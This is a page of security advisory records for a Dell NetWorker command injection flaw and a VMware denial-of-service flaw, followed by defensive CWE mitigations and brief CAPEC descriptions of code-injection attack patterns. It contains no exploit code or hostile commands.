Vulnerability from github – Published: 2023-05-31 06:30 – Updated: 2024-04-04 04:25Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.
{
"affected": [],
"aliases": [
"CVE-2023-25539"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-31T05:15:09Z",
"severity": "CRITICAL"
},
"details": "\nDell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application\u0027s underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.\n\n",
"id": "GHSA-f3pc-jh8h-4mvw",
"modified": "2024-04-04T04:25:20Z",
"published": "2023-05-31T06:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25539"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000211267/dsa-2023-060-dell-networker-security-update-for-an-nsrcapinfo-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F3VW-HMC2-2J8X
Vulnerability from github – Published: 2022-05-17 05:28 – Updated: 2022-05-17 05:28VMware Workstation 8.x before 8.0.4, VMware Player 4.x before 4.0.4, VMware ESXi 3.5 through 5.0, and VMware ESX 3.5 through 4.1 allow remote attackers to cause a denial of service (guest OS crash) via crafted traffic from a remote virtual device.
{
"affected": [],
"aliases": [
"CVE-2012-3289"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2012-06-14T20:55:00Z",
"severity": "HIGH"
},
"details": "VMware Workstation 8.x before 8.0.4, VMware Player 4.x before 4.0.4, VMware ESXi 3.5 through 5.0, and VMware ESX 3.5 through 4.1 allow remote attackers to cause a denial of service (guest OS crash) via crafted traffic from a remote virtual device.",
"id": "GHSA-f3vw-hmc2-2j8x",
"modified": "2022-05-17T05:28:36Z",
"published": "2022-05-17T05:28:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-3289"
},
{
"type": "WEB",
"url": "http://www.vmware.com/security/advisories/VMSA-2012-0011.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
Strategy: Refactoring
Refactor your program so that you do not have to dynamically generate code.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.
Mitigation MIT-32
Strategy: Compilation or Build Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation MIT-32
Strategy: Environment Hardening
Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-242: Code Injection
An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.